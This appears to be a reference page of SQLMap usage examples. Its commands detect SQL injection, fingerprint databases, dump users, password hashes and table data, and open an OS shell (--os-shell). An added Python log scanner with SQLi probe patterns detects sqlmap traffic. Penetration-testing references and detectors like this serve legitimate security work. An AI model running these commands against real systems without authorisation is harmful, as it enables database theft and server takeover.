SQLMap - SQL Injection Detection Tool

Discover and exploit SQL injection vulnerabilities with SQLMap. This powerful tool automates the process of detecting and exploiting SQL injection flaws, providing detailed database information.

SQLMap Usage Examples

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It has a detection engine for identifying SQL injection, a wide range of techniques for taking over the backend database, and support across platforms, databases, and operating systems. This section provides common usage examples for SQLMap.

SQL Injection Detection and Exploitation

SQLMap can test a given URL for SQL injection vulnerabilities. It can also parse requests from tools like Burp Suite to test for vulnerabilities.

# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner

# Parse a saved HTTP request and test it | the request file can be captured with Burp Suite
./sqlmap.py -r <request-file> <options>
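
Requests generated by the tests above show up in the target's web access log. The following added example (not part of the original page or of the sqlmap project) flags clients in Combined Log Format lines that send sqlmap's default User-Agent or repeated SQL injection probe strings; the log lines, IP addresses, paths, version string, token list and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# sqlmap's default User-Agent begins with "sqlmap/<version>"
SQLMAP_UA = re.compile(r"^sqlmap/\d", re.I)
# Generic SQL injection probe fragments (assumed list), matched after URL-decoding
SQLI_TOKENS = re.compile(
    r"\bunion\s+(all\s+)?select\b|\binformation_schema\b|\bsleep\s*\("
    r"|\b(and|or)\s+\d+\s*=\s*\d+", re.I)

def scan(lines, min_probe_hits=3):
    """Return {client_ip: set(reasons)} for clients that look like an automated SQLi scan."""
    probes = defaultdict(int)
    findings = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        ip = m["ip"]
        if SQLMAP_UA.search(m["ua"]):
            findings[ip].add("sqlmap-user-agent")
        if SQLI_TOKENS.search(unquote_plus(m["target"])):
            probes[ip] += 1
            if probes[ip] >= min_probe_hits:
                findings[ip].add("repeated-sqli-probes")
    return dict(findings)

def _line(ip, target, ua):
    return f'{ip} - - [10/Oct/2024:13:55:36 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'

# Constructed sample log lines (documentation IP ranges, hypothetical paths)
SAMPLE = [
    _line("198.51.100.7", "/item?id=1", "sqlmap/1.8#stable (https://sqlmap.org)"),
    _line("203.0.113.9", "/item?id=1%20AND%201%3D1", "Mozilla/5.0"),
    _line("203.0.113.9", "/item?id=1%20UNION%20ALL%20SELECT%20NULL", "Mozilla/5.0"),
    _line("203.0.113.9", "/item?id=1%20AND%20SLEEP(5)", "Mozilla/5.0"),
    _line("192.0.2.44", "/item?id=42", "Mozilla/5.0"),
    _line("192.0.2.44", "/search?q=union+station", "Mozilla/5.0"),  # benign text
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE).items():
        print(ip, sorted(reasons))
```

Tune `min_probe_hits` and the token list against the application's normal traffic before alerting on the result.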

Database Fingerprinting and Information Gathering

Once a vulnerability is found, SQLMap can fingerprint the database and gather crucial information about the database structure and user privileges.

# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint

# Get the current database user, current database name, and server hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname

# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba

# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords

Database Enumeration and Data Extraction

SQLMap allows for comprehensive enumeration of databases, tables, and columns, and can extract data from specific tables.

# Enumerate databases
./sqlmap.py -r <request-file> --dbs

# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables

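# Other database commands: list columns, enumerate the schema, or count table entries
./sqlmap.py -r <request-file> -D <db-name> --columns
./sqlmap.py -r <request-file> -D <db-name> --schema
./sqlmap.py -r <request-file> -D <db-name> --count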

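# Enumeration scoping flags (combine with the enumeration options above)
#   -D <db-name>    database to enumerate
#   -T <tbl-name>   table to enumerate
#   -C <col-name>   column to enumerate
#   -U <user-name>  database user to enumerate
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> -U <user-name> <options>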

# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Advanced SQL Operations and Shell Access

Beyond data extraction, SQLMap can execute custom SQL queries and even gain operating system shell access on the target server.

# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"

# Set the strings prepended (--prefix) and appended (--suffix) to the injection payload
./sqlmap.py -r <request-file> --prefix="<prefix-string>" --suffix="<suffix-string>"

# Get backdoor access to sql server | can give shell access
./sqlmap.py -r <request-file> --os-shell

External Resources